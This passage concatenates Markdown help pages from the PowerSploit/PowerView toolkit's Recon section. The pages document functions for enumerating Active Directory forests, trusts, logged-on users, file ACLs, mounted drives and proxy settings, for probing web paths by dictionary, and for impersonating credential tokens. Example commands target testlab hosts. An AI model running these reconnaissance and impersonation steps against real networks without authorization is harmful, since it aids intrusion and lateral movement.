\[Management.Automation.PSCredential\] object of alternate credentials 59 | for connection to the target forest. 
60 | 61 | ```yaml 62 | Type: PSCredential 63 | Parameter Sets: (All) 64 | Aliases: 65 | 66 | Required: False 67 | Position: Named 68 | Default value: [Management.Automation.PSCredential]::Empty 69 | Accept pipeline input: False 70 | Accept wildcard characters: False 71 | ``` 72 | 73 | ## INPUTS 74 | 75 | ## OUTPUTS 76 | 77 | ### System.DirectoryServices.ActiveDirectory.Domain 78 | 79 | ## NOTES 80 | 81 | ## RELATED LINKS 82 | 83 | -------------------------------------------------------------------------------- /powershell/PowerSploit/docs/Recon/Get-ForestGlobalCatalog.md: -------------------------------------------------------------------------------- 1 | # Get-ForestGlobalCatalog 2 | 3 | ## SYNOPSIS 4 | Return all global catalogs for the current (or specified) forest. 5 | 6 | Author: Will Schroeder (@harmj0y) 7 | License: BSD 3-Clause 8 | Required Dependencies: Get-Forest 9 | 10 | ## SYNTAX 11 | 12 | ``` 13 | Get-ForestGlobalCatalog [[-Forest] ] [-Credential ] 14 | ``` 15 | 16 | ## DESCRIPTION 17 | Returns all global catalogs for the current forest or the forest specified 18 | by -Forest X by using Get-Forest to retrieve the specified forest object 19 | and the .FindAllGlobalCatalogs() to enumerate the global catalogs. 20 | 21 | ## EXAMPLES 22 | 23 | ### -------------------------- EXAMPLE 1 -------------------------- 24 | ``` 25 | Get-ForestGlobalCatalog 26 | ``` 27 | 28 | ### -------------------------- EXAMPLE 2 -------------------------- 29 | ``` 30 | $SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force 31 | ``` 32 | 33 | $Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) 34 | Get-ForestGlobalCatalog -Credential $Cred 35 | 36 | ## PARAMETERS 37 | 38 | ### -Forest 39 | Specifies the forest name to query for global catalogs. 
40 | 41 | ```yaml 42 | Type: String 43 | Parameter Sets: (All) 44 | Aliases: 45 | 46 | Required: False 47 | Position: 1 48 | Default value: None 49 | Accept pipeline input: True (ByValue) 50 | Accept wildcard characters: False 51 | ``` 52 | 53 | ### -Credential 54 | A \[Management.Automation.PSCredential\] object of alternate credentials 55 | for connection to the target domain. 56 | 57 | ```yaml 58 | Type: PSCredential 59 | Parameter Sets: (All) 60 | Aliases: 61 | 62 | Required: False 63 | Position: Named 64 | Default value: [Management.Automation.PSCredential]::Empty 65 | Accept pipeline input: False 66 | Accept wildcard characters: False 67 | ``` 68 | 69 | ## INPUTS 70 | 71 | ## OUTPUTS 72 | 73 | ### System.DirectoryServices.ActiveDirectory.GlobalCatalog 74 | 75 | ## NOTES 76 | 77 | ## RELATED LINKS 78 | 79 | -------------------------------------------------------------------------------- /powershell/PowerSploit/docs/Recon/Get-ForestTrust.md: -------------------------------------------------------------------------------- 1 | # Get-ForestTrust 2 | 3 | ## SYNOPSIS 4 | Return all forest trusts for the current forest or a specified forest. 5 | 6 | Author: Will Schroeder (@harmj0y) 7 | License: BSD 3-Clause 8 | Required Dependencies: Get-Forest 9 | 10 | ## SYNTAX 11 | 12 | ``` 13 | Get-ForestTrust [[-Forest] ] [-Credential ] 14 | ``` 15 | 16 | ## DESCRIPTION 17 | This function will enumerate domain trust relationships for the current (or a remote) 18 | forest using number of method using the .NET method GetAllTrustRelationships() on a 19 | System.DirectoryServices.ActiveDirectory.Forest returned by Get-Forest. 20 | 21 | ## EXAMPLES 22 | 23 | ### -------------------------- EXAMPLE 1 -------------------------- 24 | ``` 25 | Get-ForestTrust 26 | ``` 27 | 28 | Return current forest trusts. 
29 | 30 | ### -------------------------- EXAMPLE 2 -------------------------- 31 | ``` 32 | Get-ForestTrust -Forest "external.local" 33 | ``` 34 | 35 | Return trusts for the "external.local" forest. 36 | 37 | ### -------------------------- EXAMPLE 3 -------------------------- 38 | ``` 39 | $SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force 40 | ``` 41 | 42 | $Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) 43 | Get-ForestTrust -Forest "external.local" -Credential $Cred 44 | 45 | Return trusts for the "external.local" forest using the specified alternate credenitals. 46 | 47 | ## PARAMETERS 48 | 49 | ### -Forest 50 | Specifies the forest to query for trusts, defaults to the current forest. 51 | 52 | ```yaml 53 | Type: String 54 | Parameter Sets: (All) 55 | Aliases: Name 56 | 57 | Required: False 58 | Position: 1 59 | Default value: None 60 | Accept pipeline input: True (ByPropertyName, ByValue) 61 | Accept wildcard characters: False 62 | ``` 63 | 64 | ### -Credential 65 | A \[Management.Automation.PSCredential\] object of alternate credentials 66 | for connection to the target domain. 67 | 68 | ```yaml 69 | Type: PSCredential 70 | Parameter Sets: (All) 71 | Aliases: 72 | 73 | Required: False 74 | Position: Named 75 | Default value: [Management.Automation.PSCredential]::Empty 76 | Accept pipeline input: False 77 | Accept wildcard characters: False 78 | ``` 79 | 80 | ## INPUTS 81 | 82 | ## OUTPUTS 83 | 84 | ### PowerView.DomainTrust.NET 85 | 86 | A TrustRelationshipInformationCollection returned when using .NET methods (default). 87 | 88 | ## NOTES 89 | 90 | ## RELATED LINKS 91 | 92 | -------------------------------------------------------------------------------- /powershell/PowerSploit/docs/Recon/Get-HttpStatus.md: -------------------------------------------------------------------------------- 1 | # Get-HttpStatus 2 | 3 | ## SYNOPSIS 4 | Returns the HTTP Status Codes and full URL for specified paths. 
5 | 6 | PowerSploit Function: Get-HttpStatus 7 | Author: Chris Campbell (@obscuresec) 8 | License: BSD 3-Clause 9 | Required Dependencies: None 10 | Optional Dependencies: None 11 | 12 | ## SYNTAX 13 | 14 | ``` 15 | Get-HttpStatus [-Target] [[-Path] ] [[-Port] ] [-UseSSL] 16 | ``` 17 | 18 | ## DESCRIPTION 19 | A script to check for the existence of a path or file on a webserver. 20 | 21 | ## EXAMPLES 22 | 23 | ### -------------------------- EXAMPLE 1 -------------------------- 24 | ``` 25 | Get-HttpStatus -Target www.example.com -Path c:\dictionary.txt | Select-Object {where StatusCode -eq 20*} 26 | ``` 27 | 28 | ### -------------------------- EXAMPLE 2 -------------------------- 29 | ``` 30 | Get-HttpStatus -Target www.example.com -Path c:\dictionary.txt -UseSSL 31 | ``` 32 | 33 | ## PARAMETERS 34 | 35 | ### -Target 36 | Specifies the remote web host either by IP or hostname. 37 | 38 | ```yaml 39 | Type: String 40 | Parameter Sets: (All) 41 | Aliases: 42 | 43 | Required: True 44 | Position: 1 45 | Default value: None 46 | Accept pipeline input: False 47 | Accept wildcard characters: False 48 | ``` 49 | 50 | ### -Path 51 | Specifies the remost host. 52 | 53 | ```yaml 54 | Type: String 55 | Parameter Sets: (All) 56 | Aliases: 57 | 58 | Required: False 59 | Position: 2 60 | Default value: .\Dictionaries\admin.txt 61 | Accept pipeline input: False 62 | Accept wildcard characters: False 63 | ``` 64 | 65 | ### -Port 66 | Specifies the port to connect to. 67 | 68 | ```yaml 69 | Type: Int32 70 | Parameter Sets: (All) 71 | Aliases: 72 | 73 | Required: False 74 | Position: 3 75 | Default value: 0 76 | Accept pipeline input: False 77 | Accept wildcard characters: False 78 | ``` 79 | 80 | ### -UseSSL 81 | Use an SSL connection. 
82 | 83 | ```yaml 84 | Type: SwitchParameter 85 | Parameter Sets: (All) 86 | Aliases: 87 | 88 | Required: False 89 | Position: Named 90 | Default value: False 91 | Accept pipeline input: False 92 | Accept wildcard characters: False 93 | ``` 94 | 95 | ## INPUTS 96 | 97 | ## OUTPUTS 98 | 99 | ## NOTES 100 | HTTP Status Codes: 100 - Informational * 200 - Success * 300 - Redirection * 400 - Client Error * 500 - Server Error 101 | 102 | ## RELATED LINKS 103 | 104 | [http://obscuresecurity.blogspot.com 105 | http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html]() 106 | 107 | -------------------------------------------------------------------------------- /powershell/PowerSploit/docs/Recon/Get-NetComputerSiteName.md: -------------------------------------------------------------------------------- 1 | # Get-NetComputerSiteName 2 | 3 | ## SYNOPSIS 4 | Returns the AD site where the local (or a remote) machine resides. 5 | 6 | Author: Will Schroeder (@harmj0y) 7 | License: BSD 3-Clause 8 | Required Dependencies: PSReflect, Invoke-UserImpersonation, Invoke-RevertToSelf 9 | 10 | ## SYNTAX 11 | 12 | ``` 13 | Get-NetComputerSiteName [[-ComputerName] ] [-Credential ] 14 | ``` 15 | 16 | ## DESCRIPTION 17 | This function will use the DsGetSiteName Win32API call to look up the 18 | name of the site where a specified computer resides. 19 | 20 | ## EXAMPLES 21 | 22 | ### -------------------------- EXAMPLE 1 -------------------------- 23 | ``` 24 | Get-NetComputerSiteName -ComputerName WINDOWS1.testlab.local 25 | ``` 26 | 27 | Returns the site for WINDOWS1.testlab.local. 28 | 29 | ### -------------------------- EXAMPLE 2 -------------------------- 30 | ``` 31 | Get-DomainComputer | Get-NetComputerSiteName 32 | ``` 33 | 34 | Returns the sites for every machine in AD. 35 | 36 | ### -------------------------- EXAMPLE 3 -------------------------- 37 | ``` 38 | $SecPassword = ConvertTo-SecureString 'Password123!' 
-AsPlainText -Force 39 | ``` 40 | 41 | $Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) 42 | Get-NetComputerSiteName -ComputerName WINDOWS1.testlab.local -Credential $Cred 43 | 44 | ## PARAMETERS 45 | 46 | ### -ComputerName 47 | Specifies the hostname to check the site for (also accepts IP addresses). 48 | Defaults to 'localhost'. 49 | 50 | ```yaml 51 | Type: String[] 52 | Parameter Sets: (All) 53 | Aliases: HostName, dnshostname, name 54 | 55 | Required: False 56 | Position: 1 57 | Default value: Localhost 58 | Accept pipeline input: True (ByPropertyName, ByValue) 59 | Accept wildcard characters: False 60 | ``` 61 | 62 | ### -Credential 63 | A \[Management.Automation.PSCredential\] object of alternate credentials 64 | for connection to the remote system using Invoke-UserImpersonation. 65 | 66 | ```yaml 67 | Type: PSCredential 68 | Parameter Sets: (All) 69 | Aliases: 70 | 71 | Required: False 72 | Position: Named 73 | Default value: [Management.Automation.PSCredential]::Empty 74 | Accept pipeline input: False 75 | Accept wildcard characters: False 76 | ``` 77 | 78 | ## INPUTS 79 | 80 | ## OUTPUTS 81 | 82 | ### PowerView.ComputerSite 83 | 84 | A PSCustomObject containing the ComputerName, IPAddress, and associated Site name. 85 | 86 | ## NOTES 87 | 88 | ## RELATED LINKS 89 | 90 | -------------------------------------------------------------------------------- /powershell/PowerSploit/docs/Recon/Get-PathAcl.md: -------------------------------------------------------------------------------- 1 | # Get-PathAcl 2 | 3 | ## SYNOPSIS 4 | Enumerates the ACL for a given file path. 
5 | 6 | Author: Will Schroeder (@harmj0y) 7 | License: BSD 3-Clause 8 | Required Dependencies: Add-RemoteConnection, Remove-RemoteConnection, ConvertFrom-SID 9 | 10 | ## SYNTAX 11 | 12 | ``` 13 | Get-PathAcl [-Path] [[-Credential] ] 14 | ``` 15 | 16 | ## DESCRIPTION 17 | Enumerates the ACL for a specified file/folder path, and translates 18 | the access rules for each entry into readable formats. 19 | If -Credential is passed, 20 | Add-RemoteConnection/Remove-RemoteConnection is used to temporarily map the remote share. 21 | 22 | ## EXAMPLES 23 | 24 | ### -------------------------- EXAMPLE 1 -------------------------- 25 | ``` 26 | Get-PathAcl "\\SERVER\Share\" 27 | ``` 28 | 29 | Returns ACLs for the given UNC share. 30 | 31 | ### -------------------------- EXAMPLE 2 -------------------------- 32 | ``` 33 | gci .\test.txt | Get-PathAcl 34 | ``` 35 | 36 | ### -------------------------- EXAMPLE 3 -------------------------- 37 | ``` 38 | $SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force 39 | ``` 40 | 41 | $Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm', $SecPassword) 42 | Get-PathAcl -Path "\\\\SERVER\Share\" -Credential $Cred 43 | 44 | ## PARAMETERS 45 | 46 | ### -Path 47 | Specifies the local or remote path to enumerate the ACLs for. 48 | 49 | ```yaml 50 | Type: String[] 51 | Parameter Sets: (All) 52 | Aliases: FullName 53 | 54 | Required: True 55 | Position: 1 56 | Default value: None 57 | Accept pipeline input: True (ByPropertyName, ByValue) 58 | Accept wildcard characters: False 59 | ``` 60 | 61 | ### -Credential 62 | A \[Management.Automation.PSCredential\] object of alternate credentials 63 | for connection to the target path. 
64 | 65 | ```yaml 66 | Type: PSCredential 67 | Parameter Sets: (All) 68 | Aliases: 69 | 70 | Required: False 71 | Position: 2 72 | Default value: [Management.Automation.PSCredential]::Empty 73 | Accept pipeline input: False 74 | Accept wildcard characters: False 75 | ``` 76 | 77 | ## INPUTS 78 | 79 | ### String 80 | 81 | One or more paths to enumerate ACLs for. 82 | 83 | ## OUTPUTS 84 | 85 | ### PowerView.FileACL 86 | 87 | A custom object with the full path and associated ACL entries. 88 | 89 | ## NOTES 90 | 91 | ## RELATED LINKS 92 | 93 | [https://support.microsoft.com/en-us/kb/305144](https://support.microsoft.com/en-us/kb/305144) 94 | 95 | -------------------------------------------------------------------------------- /powershell/PowerSploit/docs/Recon/Get-RegLoggedOn.md: -------------------------------------------------------------------------------- 1 | # Get-RegLoggedOn 2 | 3 | ## SYNOPSIS 4 | Returns who is logged onto the local (or a remote) machine 5 | through enumeration of remote registry keys. 6 | 7 | Note: This function requires only domain user rights on the 8 | machine you're enumerating, but remote registry must be enabled. 9 | 10 | Author: Matt Kelly (@BreakersAll) 11 | License: BSD 3-Clause 12 | Required Dependencies: Invoke-UserImpersonation, Invoke-RevertToSelf, ConvertFrom-SID 13 | 14 | ## SYNTAX 15 | 16 | ``` 17 | Get-RegLoggedOn [[-ComputerName] ] [-Credential ] 18 | ``` 19 | 20 | ## DESCRIPTION 21 | This function will query the HKU registry hive to retrieve the SIDs of the 22 | locally logged-on users and then attempt to resolve each SID back to an account name. 23 | Adapted technique from the Sysinternals PsLoggedOn tool. 24 | The benefit over 25 | using the NetWkstaUserEnum API (Get-NetLoggedon) is that fewer privileges are 26 | required (NetWkstaUserEnum requires remote admin access). 27 | 28 | ## EXAMPLES 29 | 30 | ### -------------------------- EXAMPLE 1 -------------------------- 31 | ``` 32 | Get-RegLoggedOn 33 | ``` 34 | 35 | Returns users actively logged onto the local host. 
36 | 37 | ### -------------------------- EXAMPLE 2 -------------------------- 38 | ``` 39 | Get-RegLoggedOn -ComputerName sqlserver 40 | ``` 41 | 42 | Returns users actively logged onto the 'sqlserver' host. 43 | 44 | ### -------------------------- EXAMPLE 3 -------------------------- 45 | ``` 46 | Get-DomainController | Get-RegLoggedOn 47 | ``` 48 | 49 | Returns users actively logged on all domain controllers. 50 | 51 | ### -------------------------- EXAMPLE 4 -------------------------- 52 | ``` 53 | $SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force 54 | ``` 55 | 56 | $Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) 57 | Get-RegLoggedOn -ComputerName sqlserver -Credential $Cred 58 | 59 | ## PARAMETERS 60 | 61 | ### -ComputerName 62 | Specifies the hostname to query for remote registry values (also accepts IP addresses). 63 | Defaults to 'localhost'. 64 | 65 | ```yaml 66 | Type: String[] 67 | Parameter Sets: (All) 68 | Aliases: HostName, dnshostname, name 69 | 70 | Required: False 71 | Position: 1 72 | Default value: Localhost 73 | Accept pipeline input: True (ByPropertyName, ByValue) 74 | Accept wildcard characters: False 75 | ``` 76 | 77 | ## INPUTS 78 | 79 | ## OUTPUTS 80 | 81 | ### PowerView.RegLoggedOnUser 82 | 83 | A PSCustomObject including the UserDomain/UserName/UserSID of each 84 | actively logged on user, with the ComputerName added. 85 | 86 | ## NOTES 87 | 88 | ## RELATED LINKS 89 | 90 | -------------------------------------------------------------------------------- /powershell/PowerSploit/docs/Recon/Get-WMIProcess.md: -------------------------------------------------------------------------------- 1 | # Get-WMIProcess 2 | 3 | ## SYNOPSIS 4 | Returns a list of processes and their owners on the local or remote machine. 
5 | 6 | Author: Will Schroeder (@harmj0y) 7 | License: BSD 3-Clause 8 | Required Dependencies: None 9 | 10 | ## SYNTAX 11 | 12 | ``` 13 | Get-WMIProcess [[-ComputerName] ] [-Credential ] 14 | ``` 15 | 16 | ## DESCRIPTION 17 | Uses Get-WMIObject to enumerate all Win32_process instances on the local or remote machine, 18 | including the owner of each process. 19 | 20 | ## EXAMPLES 21 | 22 | ### -------------------------- EXAMPLE 1 -------------------------- 23 | ``` 24 | Get-WMIProcess -ComputerName WINDOWS1 25 | ``` 26 | 27 | ### -------------------------- EXAMPLE 2 -------------------------- 28 | ``` 29 | $SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force 30 | ``` 31 | 32 | $Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) 33 | Get-WMIProcess -ComputerName PRIMARY.testlab.local -Credential $Cred 34 | 35 | ## PARAMETERS 36 | 37 | ### -ComputerName 38 | Specifies the hostname to query for running processes (also accepts IP addresses). 39 | Defaults to 'localhost'. 40 | 41 | ```yaml 42 | Type: String[] 43 | Parameter Sets: (All) 44 | Aliases: HostName, dnshostname, name 45 | 46 | Required: False 47 | Position: 1 48 | Default value: Localhost 49 | Accept pipeline input: True (ByPropertyName, ByValue) 50 | Accept wildcard characters: False 51 | ``` 52 | 53 | ### -Credential 54 | A \[Management.Automation.PSCredential\] object of alternate credentials 55 | for connection to the remote system. 56 | 57 | ```yaml 58 | Type: PSCredential 59 | Parameter Sets: (All) 60 | Aliases: 61 | 62 | Required: False 63 | Position: Named 64 | Default value: [Management.Automation.PSCredential]::Empty 65 | Accept pipeline input: False 66 | Accept wildcard characters: False 67 | ``` 68 | 69 | ## INPUTS 70 | 71 | ## OUTPUTS 72 | 73 | ### PowerView.UserProcess 74 | 75 | A PSCustomObject containing the remote process information (process details plus owner). 
76 | 77 | ## NOTES 78 | 79 | ## RELATED LINKS 80 | 81 | -------------------------------------------------------------------------------- /powershell/PowerSploit/docs/Recon/Get-WMIRegLastLoggedOn.md: -------------------------------------------------------------------------------- 1 | # Get-WMIRegLastLoggedOn 2 | 3 | ## SYNOPSIS 4 | Returns the last user who logged onto the local (or a remote) machine. 5 | 6 | Note: This function requires administrative rights on the machine you're enumerating. 7 | 8 | Author: Will Schroeder (@harmj0y) 9 | License: BSD 3-Clause 10 | Required Dependencies: None 11 | 12 | ## SYNTAX 13 | 14 | ``` 15 | Get-WMIRegLastLoggedOn [[-ComputerName] ] [-Credential ] 16 | ``` 17 | 18 | ## DESCRIPTION 19 | This function uses remote registry to enumerate the LastLoggedOnUser registry key 20 | for the local (or remote) machine. 21 | 22 | ## EXAMPLES 23 | 24 | ### -------------------------- EXAMPLE 1 -------------------------- 25 | ``` 26 | Get-WMIRegLastLoggedOn 27 | ``` 28 | 29 | Returns the last user logged onto the local machine. 30 | 31 | ### -------------------------- EXAMPLE 2 -------------------------- 32 | ``` 33 | Get-WMIRegLastLoggedOn -ComputerName WINDOWS1 34 | ``` 35 | 36 | Returns the last user logged onto WINDOWS1 37 | 38 | ### -------------------------- EXAMPLE 3 -------------------------- 39 | ``` 40 | Get-DomainComputer | Get-WMIRegLastLoggedOn 41 | ``` 42 | 43 | Returns the last user logged onto all machines in the domain. 44 | 45 | ### -------------------------- EXAMPLE 4 -------------------------- 46 | ``` 47 | $SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force 48 | ``` 49 | 50 | $Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) 51 | Get-WMIRegLastLoggedOn -ComputerName PRIMARY.testlab.local -Credential $Cred 52 | 53 | ## PARAMETERS 54 | 55 | ### -ComputerName 56 | Specifies the hostname to query for remote registry values (also accepts IP addresses). 
57 | Defaults to 'localhost'. 58 | 59 | ```yaml 60 | Type: String[] 61 | Parameter Sets: (All) 62 | Aliases: HostName, dnshostname, name 63 | 64 | Required: False 65 | Position: 1 66 | Default value: Localhost 67 | Accept pipeline input: True (ByPropertyName, ByValue) 68 | Accept wildcard characters: False 69 | ``` 70 | 71 | ### -Credential 72 | A \[Management.Automation.PSCredential\] object of alternate credentials 73 | for connecting to the remote system. 74 | 75 | ```yaml 76 | Type: PSCredential 77 | Parameter Sets: (All) 78 | Aliases: 79 | 80 | Required: False 81 | Position: Named 82 | Default value: [Management.Automation.PSCredential]::Empty 83 | Accept pipeline input: False 84 | Accept wildcard characters: False 85 | ``` 86 | 87 | ## INPUTS 88 | 89 | ## OUTPUTS 90 | 91 | ### PowerView.LastLoggedOnUser 92 | 93 | A PSCustomObject containing the ComputerName and last loggedon user. 94 | 95 | ## NOTES 96 | 97 | ## RELATED LINKS 98 | 99 | -------------------------------------------------------------------------------- /powershell/PowerSploit/docs/Recon/Get-WMIRegMountedDrive.md: -------------------------------------------------------------------------------- 1 | # Get-WMIRegMountedDrive 2 | 3 | ## SYNOPSIS 4 | Returns information about saved network mounted drives for the local (or remote) machine. 5 | 6 | Note: This function requires administrative rights on the machine you're enumerating. 7 | 8 | Author: Will Schroeder (@harmj0y) 9 | License: BSD 3-Clause 10 | Required Dependencies: ConvertFrom-SID 11 | 12 | ## SYNTAX 13 | 14 | ``` 15 | Get-WMIRegMountedDrive [[-ComputerName] ] [-Credential ] 16 | ``` 17 | 18 | ## DESCRIPTION 19 | Uses remote registry functionality to enumerate recently mounted network drives. 20 | 21 | ## EXAMPLES 22 | 23 | ### -------------------------- EXAMPLE 1 -------------------------- 24 | ``` 25 | Get-WMIRegMountedDrive 26 | ``` 27 | 28 | Returns the saved network mounted drives for the local machine. 
29 | 30 | ### -------------------------- EXAMPLE 2 -------------------------- 31 | ``` 32 | Get-WMIRegMountedDrive -ComputerName WINDOWS2.testlab.local 33 | ``` 34 | 35 | Returns the saved network mounted drives for the WINDOWS2.testlab.local machine 36 | 37 | ### -------------------------- EXAMPLE 3 -------------------------- 38 | ``` 39 | Get-DomainComputer | Get-WMIRegMountedDrive 40 | ``` 41 | 42 | Returns the saved network mounted drives for all machines in the domain. 43 | 44 | ### -------------------------- EXAMPLE 4 -------------------------- 45 | ``` 46 | $SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force 47 | ``` 48 | 49 | $Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) 50 | Get-WMIRegMountedDrive -ComputerName PRIMARY.testlab.local -Credential $Cred 51 | 52 | ## PARAMETERS 53 | 54 | ### -ComputerName 55 | Specifies the hostname to query for mounted drive information (also accepts IP addresses). 56 | Defaults to 'localhost'. 57 | 58 | ```yaml 59 | Type: String[] 60 | Parameter Sets: (All) 61 | Aliases: HostName, dnshostname, name 62 | 63 | Required: False 64 | Position: 1 65 | Default value: Localhost 66 | Accept pipeline input: True (ByPropertyName, ByValue) 67 | Accept wildcard characters: False 68 | ``` 69 | 70 | ### -Credential 71 | A \[Management.Automation.PSCredential\] object of alternate credentials 72 | for connecting to the remote system. 73 | 74 | ```yaml 75 | Type: PSCredential 76 | Parameter Sets: (All) 77 | Aliases: 78 | 79 | Required: False 80 | Position: Named 81 | Default value: [Management.Automation.PSCredential]::Empty 82 | Accept pipeline input: False 83 | Accept wildcard characters: False 84 | ``` 85 | 86 | ## INPUTS 87 | 88 | ## OUTPUTS 89 | 90 | ### PowerView.RegMountedDrive 91 | 92 | A PSCustomObject containing the ComputerName and mounted drive information. 
93 | 94 | ## NOTES 95 | 96 | ## RELATED LINKS 97 | 98 | -------------------------------------------------------------------------------- /powershell/PowerSploit/docs/Recon/Get-WMIRegProxy.md: -------------------------------------------------------------------------------- 1 | # Get-WMIRegProxy 2 | 3 | ## SYNOPSIS 4 | Enumerates the proxy server and WPAD conents for the current user. 5 | 6 | Author: Will Schroeder (@harmj0y) 7 | License: BSD 3-Clause 8 | Required Dependencies: None 9 | 10 | ## SYNTAX 11 | 12 | ``` 13 | Get-WMIRegProxy [[-ComputerName] ] [-Credential ] 14 | ``` 15 | 16 | ## DESCRIPTION 17 | Enumerates the proxy server and WPAD specification for the current user 18 | on the local machine (default), or a machine specified with -ComputerName. 19 | It does this by enumerating settings from 20 | HKU:SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings. 21 | 22 | ## EXAMPLES 23 | 24 | ### -------------------------- EXAMPLE 1 -------------------------- 25 | ``` 26 | Get-WMIRegProxy 27 | ``` 28 | 29 | ComputerName ProxyServer AutoConfigURL Wpad 30 | ------------ ----------- ------------- ---- 31 | WINDOWS1 http://primary.test... 32 | 33 | ### -------------------------- EXAMPLE 2 -------------------------- 34 | ``` 35 | $Cred = Get-Credential "TESTLAB\administrator" 36 | ``` 37 | 38 | Get-WMIRegProxy -Credential $Cred -ComputerName primary.testlab.local 39 | 40 | ComputerName ProxyServer AutoConfigURL Wpad 41 | ------------ ----------- ------------- ---- 42 | windows1.testlab.local primary.testlab.local 43 | 44 | ## PARAMETERS 45 | 46 | ### -ComputerName 47 | Specifies the system to enumerate proxy settings on. 48 | Defaults to the local host. 
49 | 50 | ```yaml 51 | Type: String[] 52 | Parameter Sets: (All) 53 | Aliases: HostName, dnshostname, name 54 | 55 | Required: False 56 | Position: 1 57 | Default value: $Env:COMPUTERNAME 58 | Accept pipeline input: True (ByPropertyName, ByValue) 59 | Accept wildcard characters: False 60 | ``` 61 | 62 | ### -Credential 63 | A \[Management.Automation.PSCredential\] object of alternate credentials 64 | for connecting to the remote system. 65 | 66 | ```yaml 67 | Type: PSCredential 68 | Parameter Sets: (All) 69 | Aliases: 70 | 71 | Required: False 72 | Position: Named 73 | Default value: [Management.Automation.PSCredential]::Empty 74 | Accept pipeline input: False 75 | Accept wildcard characters: False 76 | ``` 77 | 78 | ## INPUTS 79 | 80 | ### String 81 | 82 | Accepts one or more computer name specification strings on the pipeline (netbios or FQDN). 83 | 84 | ## OUTPUTS 85 | 86 | ### PowerView.ProxySettings 87 | 88 | Outputs custom PSObjects with the ComputerName, ProxyServer, AutoConfigURL, and WPAD contents. 89 | 90 | ## NOTES 91 | 92 | ## RELATED LINKS 93 | 94 | -------------------------------------------------------------------------------- /powershell/PowerSploit/docs/Recon/Invoke-RevertToSelf.md: -------------------------------------------------------------------------------- 1 | # Invoke-RevertToSelf 2 | 3 | ## SYNOPSIS 4 | Reverts any token impersonation. 5 | 6 | Author: Will Schroeder (@harmj0y) 7 | License: BSD 3-Clause 8 | Required Dependencies: PSReflect 9 | 10 | ## SYNTAX 11 | 12 | ``` 13 | Invoke-RevertToSelf [[-TokenHandle] ] 14 | ``` 15 | 16 | ## DESCRIPTION 17 | This function uses RevertToSelf() to revert any impersonated tokens. 18 | If -TokenHandle is passed (the token handle returned by Invoke-UserImpersonation), 19 | CloseHandle() is used to close the opened handle. 20 | 21 | ## EXAMPLES 22 | 23 | ### -------------------------- EXAMPLE 1 -------------------------- 24 | ``` 25 | $SecPassword = ConvertTo-SecureString 'Password123!' 
-AsPlainText -Force 26 | ``` 27 | 28 | $Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) 29 | $Token = Invoke-UserImpersonation -Credential $Cred 30 | Invoke-RevertToSelf -TokenHandle $Token 31 | 32 | ## PARAMETERS 33 | 34 | ### -TokenHandle 35 | An optional IntPtr TokenHandle returned by Invoke-UserImpersonation. 36 | 37 | ```yaml 38 | Type: IntPtr 39 | Parameter Sets: (All) 40 | Aliases: 41 | 42 | Required: False 43 | Position: 1 44 | Default value: None 45 | Accept pipeline input: False 46 | Accept wildcard characters: False 47 | ``` 48 | 49 | ## INPUTS 50 | 51 | ## OUTPUTS 52 | 53 | ## NOTES 54 | 55 | ## RELATED LINKS 56 | 57 | -------------------------------------------------------------------------------- /powershell/PowerSploit/docs/Recon/Invoke-UserImpersonation.md: -------------------------------------------------------------------------------- 1 | # Invoke-UserImpersonation 2 | 3 | ## SYNOPSIS 4 | Creates a new "runas /netonly" type logon and impersonates the token. 5 | 6 | Author: Will Schroeder (@harmj0y) 7 | License: BSD 3-Clause 8 | Required Dependencies: PSReflect 9 | 10 | ## SYNTAX 11 | 12 | ### Credential (Default) 13 | ``` 14 | Invoke-UserImpersonation -Credential [-Quiet] 15 | ``` 16 | 17 | ### TokenHandle 18 | ``` 19 | Invoke-UserImpersonation -TokenHandle [-Quiet] 20 | ``` 21 | 22 | ## DESCRIPTION 23 | This function uses LogonUser() with the LOGON32_LOGON_NEW_CREDENTIALS LogonType 24 | to simulate "runas /netonly". 25 | The resulting token is then impersonated with 26 | ImpersonateLoggedOnUser() and the token handle is returned for later usage 27 | with Invoke-RevertToSelf. 28 | 29 | ## EXAMPLES 30 | 31 | ### -------------------------- EXAMPLE 1 -------------------------- 32 | ``` 33 | $SecPassword = ConvertTo-SecureString 'Password123!' 
-AsPlainText -Force 34 | ``` 35 | 36 | $Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) 37 | Invoke-UserImpersonation -Credential $Cred 38 | 39 | ## PARAMETERS 40 | 41 | ### -Credential 42 | A \[Management.Automation.PSCredential\] object with alternate credentials 43 | to impersonate in the current thread space. 44 | 45 | ```yaml 46 | Type: PSCredential 47 | Parameter Sets: Credential 48 | Aliases: 49 | 50 | Required: True 51 | Position: Named 52 | Default value: None 53 | Accept pipeline input: False 54 | Accept wildcard characters: False 55 | ``` 56 | 57 | ### -TokenHandle 58 | An IntPtr TokenHandle returned by a previous Invoke-UserImpersonation. 59 | If this is supplied, LogonUser() is skipped and only ImpersonateLoggedOnUser() 60 | is executed. 61 | 62 | ```yaml 63 | Type: IntPtr 64 | Parameter Sets: TokenHandle 65 | Aliases: 66 | 67 | Required: True 68 | Position: Named 69 | Default value: None 70 | Accept pipeline input: False 71 | Accept wildcard characters: False 72 | ``` 73 | 74 | ### -Quiet 75 | Suppress any warnings about the thread apartment state (STA vs MTA). 76 | 77 | ```yaml 78 | Type: SwitchParameter 79 | Parameter Sets: (All) 80 | Aliases: 81 | 82 | Required: False 83 | Position: Named 84 | 